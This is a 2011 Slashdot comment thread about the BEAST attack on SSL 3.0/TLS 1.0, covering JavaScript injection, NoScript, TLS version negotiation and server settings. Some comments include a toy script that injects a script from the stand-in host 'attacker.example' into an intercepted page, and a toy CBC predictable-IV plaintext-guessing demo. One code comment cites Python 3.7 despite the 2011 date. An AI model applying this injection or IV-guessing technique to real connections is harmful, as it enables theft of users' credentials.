Hackers Break Browser SSL/TLS Encryption

First time accepted submitter CaVp writes with an article in The Register about an exploit that appears to affect all browsers and can decrypt an active TLS session. From the article: "Researchers have discovered a serious weakness in virtually all websites protected by the secure sockets layer protocol that allows attackers to silently decrypt data that's passing between a webserver and an end-user browser." A full disclosure is scheduled for Friday September 23rd at the Ekoparty conference. Note that this only affects SSL 2.0 and TLS 1.0; unfortunately, most web servers are misconfigured to still accept SSL 2.0, and TLS 1.1 and 1.2 have seen limited deployment. The practicality of the attack remains to be determined (for one, it isn't very fast — but if the intent is just to decrypt the data for later use, that isn't an impediment).
This discussion has been archived. No new comments can be posted.

  • gee golly I guess we better just turn it all off and call it quits before the hackers get us.
    • You do realize that 90% of websites out there still use only 2.0 as they are not 3.0 compliant?

    • Who do you do your banking with? I want to see if they are still using 2.0, as I know 90% of websites are still on 2.0 as we speak.

  • Javascript (Score:4, Informative)

    by Hatta ( 162192 ) on Tuesday September 20, 2011 @02:20PM (#37459178) Journal

    From the looks of it, they use javascript on the target computer to capture some plain text which helps them break the keys. So as a temporary measure, disable javascript until browser makers catch up.

    • Re:Javascript (Score:4, Informative)

      by MightyMartian ( 840721 ) on Tuesday September 20, 2011 @02:22PM (#37459190) Journal

      Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

      • Re:Javascript (Score:5, Insightful)

        by Hatta ( 162192 ) on Tuesday September 20, 2011 @02:35PM (#37459318) Journal

        For one, /. works a lot better with javascript disabled.

      • by tlhIngan ( 30335 )

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        For quite a while, Apple's actually worked decently without javascript. Heck, it even renders pretty much the same (it wasn't until I noticed things were a bit "off" that I realized NoScript was blocking it).

        I think though the iTunes pages have completely broken now as have a few others. But until recently, they had a site that worked and acted pretty good withou

      • The really awful ones that embed full-screen flash apps instead of javascript?
        • by Calos ( 2281322 )

          Not even those any more; many sites use JS to check for Flash and the installed version :/

      • Re:Javascript (Score:4, Insightful)

        by vlm ( 69642 ) on Tuesday September 20, 2011 @02:54PM (#37459496)

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        A good first-order approximation is that any website even vaguely attempting to be ADA compliant probably works fine without javascript.

        Run with "noscript" for awhile, maybe a couple years, and you'll come to agree.

        • by EdIII ( 1114411 )

          Most people don't even know what ADA compliant means. Furthermore, what the heck does a client-side language have to do with disabled people? How does javascript inherently prevent a disabled person from interacting with a website?

          I don't have a single website that does not use javascript via JQuery. It just works.

          NoScript? Fine. As a default that is. You will run into more sites that require javascript to do something, than ones that do not. We just redirect to a page that asks you to turn on j

      • Re:Javascript (Score:5, Insightful)

        by dissy ( 172727 ) on Tuesday September 20, 2011 @04:07PM (#37460462)

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        As a happy noscript user I was about to reply similarly to VLM below...

        But instead it prompted me to check how many entries are in my noscript whitelist after using the same firefox profile for a bit over 3 years. There are only 275 entries, of which 80 are various internal IPs for work-related webapps and testing/development (which I really need to clean out).

        I don't think it's too bad of a sign that in 3 years only 200 websites I've visited were 'broken' without javascript! I was actually expecting a much higher number.

        Even with that 200, or let's include the internal webapp sites at work and say 300: the number of websites I've visited over the past three years has to be in the high four digits, so that is a pretty awesome ratio!

        Most websites really do not break enough to matter when rolling without javascript. Even in mitigating this type of attack, I would rather white list the few sites that need it than leave javascript blanket open to every website out there.

        Of course this solution isn't 100% perfect (It's "only" mostly perfect), so it will no doubt get poopoo'ed here on slashdot for not being over 100% perfect in every way

        • Usually I just temporarily allow sites so they don't end up in my white list. Many sites are broken without JS.
        • Don't you use the temporary permissions? I use them for most websites which I don't visit regularly, and AFAIK those don't appear in the whitelist.

          • by dissy ( 172727 )

            Don't you use the temporary permissions? I use them for most websites which I don't visit regularly, and AFAIK those don't appear in the whitelist.

            You are correct that temp items are not added to the whitelist (At least not the one you can export)

            I don't really use it though. Not in this way at least.

            When I first decide I want to allow a function on a website, if there are multiple domains listed (Usually embedded video pages are the worst at this), I will use temporary allow/block to find the right domain to allow just what I am wanting.

            Once I figure out which domains need to be allowed, however, I go back and make them permanent. If I don't trust the web

      • by antdude ( 79039 )

        Doesn't Gopher have security vulnerabilities too? ;)

      • Pretty much all of mine. Just saying...
      • by PJ6 ( 1151747 )

        Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        Javascript will be long gone from mainstream by then.

      • Yeah, and see how many websites built in the last eight or nine years work without Javascript... Hell, for real security, go back to using Gopher!

        There are something on the order of a few million websites out there, maybe a few hundred million.

        95% of the time, you're probably visiting the same small set of websites, so just whitelist those. The other 5%? Temporary whitelist when you visit them. If they're worth visiting again, then maybe you whitelist them next week.

        Which is a big step up from let
    • by ge7 ( 2194648 )
      And how do you think they will inject that javascript into the webpage, exactly? They cannot.
      • by Anonymous Coward

        Okay, then how do we get malware infections from reputable sites? Yeah, the easy way is just to buy ads; the info you harvest would make it well worth the investment. And as always, human stupidity is unpatchable; you would be surprised by how many people still click on links sent to them.

      • Methinks you have spoken too soon. The right answer is "it depends", but there are ways to get arbitrary javascript to run on web pages: cross-site scripting, simple form submission of JS code, MITM injection, malicious code on the server, etc.

        OR, you know something I don't. If so, please share.

        • Most of those won't work on an SSL connection. I think the only one that would is a compromised server, but if a (eg) Paypal server is compromised then you've got a lot bigger problems to worry about.

          • by Lennie ( 16154 )

            This is a man-in-the-middle attack which injects the JavaScript code into the webpage in the SSL stream, I guess...?

            Or do it on the HTTP page...?

            I guess we'll know in a few days.

            • This is a man-in-the-middle attack which injects the JavaScript code into the webpage in the SSL stream.

              SSL prevents that (it would be pretty useless otherwise...)

        • by framed ( 153355 )
          MITM doesn't work against https unless the users are accepting bad certs already. If the page you're looking at was sent over https, it's not alterable to include malicious javascript en route. Someone on the network doesn't have your key, and so they can't spoof a request to take advantage of persistent https connections. XSS is dependent on your users looking at each other's data and you not filtering it well. So unless your server or client are already owned (at which point this doesn't matter), or y
          • by Qzukk ( 229616 )

            If the question is simply a matter of figuring out the plaintext, why bother with javascript at all? After all, somewhere in the middle of this page is going to be the plaintext "If the question is simply a matter of figuring out the plaintext, why bother with javascript at all?"

      • Re:Javascript (Score:5, Informative)

        by chrb ( 1083577 ) on Tuesday September 20, 2011 @02:37PM (#37459338)
        They can. Not only is Javascript injection possible, it has already been done by at least one malicious government [theregister.co.uk]: "Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government, according to security experts and news reports."
        • Javascript injection into an SSL connection is a bit more difficult...

          • Re:Javascript (Score:4, Insightful)

            by increment1 ( 1722312 ) on Tuesday September 20, 2011 @03:32PM (#37460020)

            I think the idea is to inject the Javascript before the connection goes SSL. So maybe something like:

            1. You go visit www.gmail.com
            2. They intercept and return an http version of the page to you with the javascript injected
            3. The Javascript opens up an https connection with gmail.com, establishing the IV over a persistent connection.
            4. The Javascript redirects to the https page, so you don't notice the lack of https.
            5. You log in to the https page as normal, using the browser's already-established https connection, which they can apparently decrypt.

            If not for step 4, this attack would be little different from just intercepting and returning a non-https page and hoping that you didn't notice the difference. Depending on how long your browser keeps a persistent https connection open, I wonder if it is possible to have the javascript on an independent page, making the https requests to the target site to establish the connection before you even go to the target site.
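
            A minimal sketch of what step 2 above amounts to, assuming the attacker can rewrite a plain-HTTP response on the wire; the script URL and page are made up for illustration and this is plain string manipulation, not a working interception tool:

            def inject_script(html, script_url="https://attacker.example/beast.js"):
                # Toy illustration only: splice an extra <script> tag into an
                # unencrypted HTML response passing through the attacker's network position.
                tag = '<script src="%s"></script>' % script_url
                if "</body>" in html:
                    return html.replace("</body>", tag + "</body>", 1)
                return html + tag

            page = "<html><body><h1>Welcome to your bank</h1></body></html>"
            print(inject_script(page))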

            • Unless I'm very mistaken, SSL doesn't work like that. SSL is designed to prevent man-in-the-middle attacks. The session key for the encryption has to be signed using Google's public key - which the attacker can't do.

              (Or maybe they can, after all the recent hacks...)

              • Unless I'm very mistaken, SSL doesn't work like that. SSL is designed to prevent man-in-the-middle attacks. The session key for the encryption has to be signed using Google's public key - which the attacker can't do.

                The SSL session is signed, but according to this new attack, if an attacker can inject known plaintext and see the sniffed encrypted text of the same, then they can somehow manage to decrypt some portion (or all) of further communication. So it is not breaking the establishment of the SSL connection (as a normal MITM attack would); it is directly decrypting the encrypted communication (the confidentiality component of SSL).
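
                A toy sketch (not the actual exploit) of why injected known/chosen plaintext helps when the IV is predictable. It assumes AES-CBC via the third-party 'cryptography' package and a made-up 16-byte secret; the point is that when the next IV is just the last ciphertext block, an attacker who can choose the next plaintext block can confirm a guess at the secret:

                import os
                from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

                key = os.urandom(16)

                def cbc_encrypt(iv, plaintext):
                    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
                    return enc.update(plaintext) + enc.finalize()

                # The victim's browser encrypts a secret block; the attacker sniffs the
                # ciphertext and the IV (in TLS 1.0 the IV is the previous record's last
                # ciphertext block, so it is visible on the wire).
                secret = b"password=hunter2"        # 16 bytes, unknown to the attacker
                iv_for_secret = os.urandom(16)      # observed by the attacker
                secret_ct = cbc_encrypt(iv_for_secret, secret)

                # The attacker chooses the next record's first plaintext block (e.g. via
                # injected javascript) and already knows its IV: the last block just sent.
                next_iv = secret_ct[-16:]

                def guess_is_right(guess):
                    # Craft the block so that, after CBC chaining, the cipher input matches
                    # what it was when the secret was encrypted; equal ciphertext = correct guess.
                    crafted = bytes(a ^ b ^ c for a, b, c in zip(guess, iv_for_secret, next_iv))
                    return cbc_encrypt(next_iv, crafted)[:16] == secret_ct[:16]

                print(guess_is_right(b"password=hunter1"))   # False
                print(guess_is_right(b"password=hunter2"))   # True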

                • I'd be curious if the injected traffic has to be on the targeted site... I wonder if the approach is to inject the javascript on some non-encrypted page and use it to load the encrypted known text.
                  • by mzs ( 595629 )

                    That makes much more sense; I would expect to see the "some of the data is not encrypted" warning with what increment1 proposed.

      • A lot of banks use services such as Advanced web analytics, which include bits of javascript from advanced-web-analytics.com inside their secure pages. I'm not sure how secure their servers are, but I for one have blocked their server on our proxy.
    • Come on, be logical. The only adequate response to a not-yet-presented attack vector that requires a packet sniffer on the network and injected Javascript in the webpage while taking hours to decrypt a single cookie is to stop using the Internet altogether until it gets fixed. Based on Slashdot user comments, it's the only reasonable thing to do.
  • by Anonymous Coward

    What would be the ramifications of disabling TLS 1.0 in the browser (Opera)? By default, TLS 1.0 is enabled and TLS 1.1 & 1.2 are disabled. Also, SSL 3 is enabled and there is no option for earlier versions, so I assume SSL 2 is already disabled in Opera.

    • by chrb ( 1083577 ) on Tuesday September 20, 2011 @02:34PM (#37459314)
      The ramification is that you won't be able to use HTTPS on the vast majority of web sites. According to the Register [regmedia.co.uk], of 1 million web servers sampled: 604,242 supported TLS v1.0, 838 supported TLS v1.1, and 11 supported TLS v1.2.
    • by Necroman ( 61604 ) on Tuesday September 20, 2011 @02:37PM (#37459328)

      Stolen from the thread on this on reddit [reddit.com]:

      That's actually exactly how it's supposed to work. See Appendix E of the TLS 1.2 RFC. The client sends its highest-supported version in its first message, and the server replies with the highest-supported version that is less than or equal to the version the client sent.

      Unfortunately, some older (mostly third-party) servers break entirely if they receive something that they don't recognize. As such, TLS 1.1/1.2 is often disabled by default for compatibility reasons, even if it is supported.

      NSS (Mozilla/Firefox) and OpenSSL (used in Apache's mod_ssl) also only support up to TLS 1.0 in their stable versions, as there hasn't really been a compelling reason for them to add TLS 1.1/1.2 support until now.
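
      For what it's worth, a minimal sketch of the negotiation rule described above; the version tuples and the sets of supported versions are illustrative, not real handshake structures:

      # Client offers its highest version; the server answers with the highest
      # version it supports that is <= the client's offer (RFC 5246, Appendix E).
      TLS_1_0, TLS_1_1, TLS_1_2 = (3, 1), (3, 2), (3, 3)

      def negotiate(client_max, server_supported):
          candidates = [v for v in server_supported if v <= client_max]
          if not candidates:
              raise ValueError("handshake_failure: no common protocol version")
          return max(candidates)

      print(negotiate(TLS_1_2, {TLS_1_0}))            # (3, 1) -> TLS 1.0
      print(negotiate(TLS_1_0, {TLS_1_0, TLS_1_2}))   # (3, 1) -> TLS 1.0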

    • by Ant P. ( 974313 )

      SSL2 has been gone in any decent browser for a long time now. The latest versions of Chrome (currently 15.0.874.1) don't even have checkboxes for SSL3/TLS any more, so fuck knows what data it's leaking behind my back...

      • by Calos ( 2281322 )

        Sure they do: Options -> Under the Hood. There's a checkbox for SSL 3.0, and one for TLS 1.0. So, similar to what the poster above you said, it looks like they don't expose TLS 1.1/1.2 in releases yet.

  • Not very fast? (Score:5, Interesting)

    by chrb ( 1083577 ) on Tuesday September 20, 2011 @02:28PM (#37459264)

    The attack can apparently be completed in about 5 minutes. That is plenty of time for attacking the average online banking session, never mind gmail and other sites that people log in to for hours at a time.

    The attack appears to use javascript to push known plaintext over HTTPS to the web site before the actual login request is sent, so that the login credentials are transferred as part of a persistent SSL connection which now has a known IV. If this is correct, then the attack could be avoided by disabling persistent HTTPS connections in the browser. There is a performance cost to this, but I think most people would prefer to feel secure, and wouldn't really notice the extra costs of opening and closing individual HTTPS sessions for each browser request. Proxies might break that though.
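
    To illustrate the "no persistent connections" idea outside the browser, here is a minimal Python sketch that makes each HTTPS request on its own connection; the hostname is a placeholder, and whether this actually defeats the attack depends on details we won't know until the disclosure:

    import http.client

    def fetch_once(host, path="/"):
        # One connection (and one TLS handshake) per request: no keep-alive reuse.
        conn = http.client.HTTPSConnection(host, timeout=10)
        try:
            conn.request("GET", path, headers={"Connection": "close"})
            resp = conn.getresponse()
            return resp.status, resp.read()
        finally:
            conn.close()

    status, body = fetch_once("example.com")
    print(status, len(body))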

  • Ah ha! (Score:5, Funny)

    by Howard Beale ( 92386 ) on Tuesday September 20, 2011 @02:32PM (#37459294)
    Now we know what that 30,000 node EC2 cluster was for...
  • unfortunately most web servers are misconfigured to still accept SSL 2.0, and TLS 1.1 and 1.2 have seen limited deployment.

    Uh, I'm pretty sure the web server is required to have enough flexibility for people to view the content. If the user demands security, that should be negotiated by the client trying to use the most secure option possible. Saying a server is "misconfigured" might be nice for someone living in a bubble where everything is up to date and users have a clue, but in the real world serv

    • SSLv2 being accepted by the server is a misconfiguration.

      I manage multiple sites used by Fortune 100 companies (who are often slow to upgrade clients) and have had SSLv2 turned off on the server for years.

    • Re: (Score:3, Insightful)

      by izomiac ( 815208 )
      Fall back to regular HTTP then. There's no point in insecure HTTPS. Security is the "S" in these protocols and the sole reason for their existence. Someone who opts to use them has explicitly requested security, not compatibility, as most sites lack any form of SSL.

      For most bugs, you're right. Convenience trumps most other things in software. Security is not one of them. Your users are trusting you to keep them safe. An insecure browsing session will eventually (quickly?) lead to money being stole
      • > Fall back to regular HTTP then. There's no point in insecure HTTPS.

        But there is a point in insecure HTTP??

        > Security is the "S" in these protocols and the sole reason for their
        > existence.

        I know this is hard for guys like you to accept, but the much-touted "S" has become a ridiculous notion. Especially when coupled with some outlandish DEV-belief, that users "have a sense of security", trained or otherwise.
        SSL IN ITS CURRENT FORM IS BROKEN AND HAS BEEN SINCE THE BEGINNING!!

  • Surely Javascript sent from the server with which the SSL session has been made has the opportunity to read what's being transmitted to/from the server anyway? And third party Javascript doesn't get access to random SSL connections with other domains?

    What are these guys claiming? That known plaintext at the start of an SSL session plus access to all packets passing between client and server means further characters can eventually be worked out?

    • by dave562 ( 969951 )

      What are these guys claiming? That known plaintext at the start of an SSL session plus access to all packets passing between client and server means further characters can eventually be worked out?

      That seems to be what they are claiming. If you know at least SOME of what is encrypted, it becomes much easier to decrypt the rest.

  • It looks like the summary above is mistaken. TFA says that TLS 1.0 and before are affected. Shouldn't that include SSL 3.0 as well as 2.0? It matters because if the summary is correct, we can tell our browsers not to use TLS 1.0 but keep using SSL 3.0. If not, we're stuck waiting for fixes from, well, everybody.

    • by yuhong ( 1378501 )

      Yea, to the Slashdot editors:
       

      Note that this only affects SSL 3.0 and TLS 1.0

      • by blair1q ( 305137 )

        Nice. Guess which are the only two options available on this browser...

        • by yuhong ( 1378501 )

          Yea, SSL 2.0 has worse flaws: not only the protocol flaws, but also the fact that Netscape 1.x's random number generator was not really random.

      • Yea, to the Slashdot editors:

         

        Note that this only affects SSL 3.0 and TLS 1.0

        The editors are too busy telling us that this is the first article from the submitter to be accepted; you can't expect them to perform that important function and actually glance at the article, now can you?

    • Yes, SSL 3.0 and TLS 1.0 are both affected. And yes, we'll be waiting on fixes from just about everyone. (Or, everyone may just move to TLS v1.1 - that's safe too.)

      Here's a page that's tracking this for file transfer applications that includes a nice discussion of general purpose web servers and browsers and their current "support of TLS v1.1" status at the end: http://www.filetransferconsulting.com/file-transferbeast-tls-vulnerability/ [filetransf...ulting.com]

  • So does it now affect sslv3 even with TLS1.0 activated? If not, then upgrade firefox. Version 6.0.2 has ssl2 disabled.

    • by GNious ( 953874 )

      While reading this, I received a notification from Firefox that an update was available. I was thinking "That was quick!", but alas, it is just a fix for reducing the memory footprint.

  • The Browser break hackers!

  • In my view, this should fix the error provided you change TLSv1 to 1.1 or 1.2. We are forced to run SSLv3 on our servers for PCI compliance.

    SSLProtocol -all +SSLv3 +TLSv1
    SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM
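
    If it helps, here is a hedged Python sketch (Python 3.7+ ssl module) for checking which protocol versions a server will actually negotiate after a config change like the one above; the hostname is a placeholder, and note that a modern client-side OpenSSL may itself refuse to offer TLS 1.0:

    import socket, ssl

    def negotiates(host, version, port=443):
        # Restrict the client to a single protocol version and see whether the
        # server completes the handshake. Certificate checks are disabled because
        # we only care about the protocol version here.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        ctx.minimum_version = version
        ctx.maximum_version = version
        try:
            with socket.create_connection((host, port), timeout=5) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    return tls.version() is not None
        except (ssl.SSLError, OSError):
            return False

    for v in (ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1, ssl.TLSVersion.TLSv1_2):
        print(v.name, negotiates("example.com", v))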

  • by Anonymous Coward

    This attack uses Javascript (previously injected) to try to perform an adaptive chosen-plaintext attack (explicit mention of which dates from 2002[1]). TLS 1.1 and up use an explicit random IV for each CBC-encrypted record to mitigate that attack, but TLS 1.0 and the older SSL protocols use the previous record's trailing ciphertext block as the IV for the next one.

    I question whether it really brings anything new to the table as Javascript injection brings the ability to do much more devious things rather than messing around w
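
    As a quick sketch of the difference described above, here is the TLS 1.1-style behaviour in isolation, again using the third-party 'cryptography' package with made-up values: with a fresh random IV per record, encrypting the same block twice gives different ciphertext, so an attacker can no longer confirm a plaintext guess by comparing ciphertext blocks.

    import os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    key = os.urandom(16)
    block = b"password=hunter2"   # same 16-byte plaintext both times

    def encrypt_record(plaintext):
        iv = os.urandom(16)       # explicit, unpredictable IV for every record
        enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
        return iv, enc.update(plaintext) + enc.finalize()

    iv1, ct1 = encrypt_record(block)
    iv2, ct2 = encrypt_record(block)
    print(ct1 != ct2)             # True: identical plaintext, different ciphertext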

  • by Anonymous Coward

    It says "against a victim who is on a network on which they have a man-in-the-middle position" so they have installed monitoring software on the victims computer that gives them full access in which case why would they need this is the first place?

    • It's "man-in-the-middle" because it requires a javascript injection. That might be possible through vulnerabilities in particular websites (eg embedded ads with javascript, or a crafted link, etc). It could also be injected by an ISP.

  • by Anonymous Coward

    According to this post, OpenSSL using TLS 1.0 should not be susceptible:

    http://marc.info/?l=openssl-dev&m=131654410924995&w=2

    Don't know about NSS though.

  • SSH Tunneling (Score:3, Informative)

    by dendrope ( 2470388 ) on Monday September 26, 2011 @12:51AM (#37512518)
    If you have a computer at home running on a secured network, then tunneling your traffic over SSH while you're elsewhere should avert the problem.

"An idealist is one who, on noticing that a rose smells better than a cabbage, concludes that it will also make better soup." - H.L. Mencken

Working...